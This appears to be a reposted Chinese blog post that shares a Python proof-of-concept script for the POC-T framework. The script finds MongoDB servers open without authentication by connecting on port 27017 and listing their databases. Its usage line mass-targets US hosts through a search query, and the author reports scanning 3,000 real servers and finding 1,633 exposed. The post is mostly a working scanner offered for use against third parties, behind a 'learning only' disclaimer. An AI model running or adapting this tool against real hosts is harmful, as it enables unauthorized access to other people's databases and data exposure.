mongodb未授权访问脚本

有事候知识整合起来会发生很大的威力，尝试着写了一个poc来测试mongodb的未授权访问漏洞，发现危害还是很大的。

把脚本放在https://github.com/Xyntax/POC-T，框架的script目录下面。脚本仅供学习：要安装pymongo

#!/usr/bin/python
# -*- coding: UTF-8 -*-

"""
moogodb未授权访问

Usage:
  python POC-T.py -s mongodb-unauth -aZ "port:27017 country:us"

"""


import socket
import sys
import pymongo
from plugin.util import host2IP
from plugin.util import checkPortTcp

def poc(url):
	url = host2IP(url)
	ip = url.split(':')[0]
	try:
		if not checkPortTcp(ip,27017):
			return False
		if testConnect(ip,27017):
			return ip
	except Exception,e:
		return False
	return False

def testConnect(ip,port=27017):
	global dbname
	try:
		conn = pymongo.MongoClient(ip,27017,socketTimeoutMS=3000)
		dbname = conn.database_names()
		#print dbname
		if dbname:
			return True
	except Exception,e:
		return False

以关键字搜索，扫了3000个，有1633个存在漏洞。

版权声明：本文来源CSDN，感谢博主原创文章，遵循 CC 4.0 by-sa 版权协议，转载请附上原文出处链接和本声明。
原文链接：https://blog.csdn.net/ZZZJX7/article/details/52503546
站方申明：本站部分内容来自社区用户分享，若涉及侵权，请联系站方删除。

发表于 2019-09-05 20:02:18
阅读 ( 1659 )
分类：数据库

mongodb未授权访问脚本

你可能感兴趣的文章

精选的优质文章

0 条评论

官方社群

GO教程

推荐文章

猜你喜欢

随便看看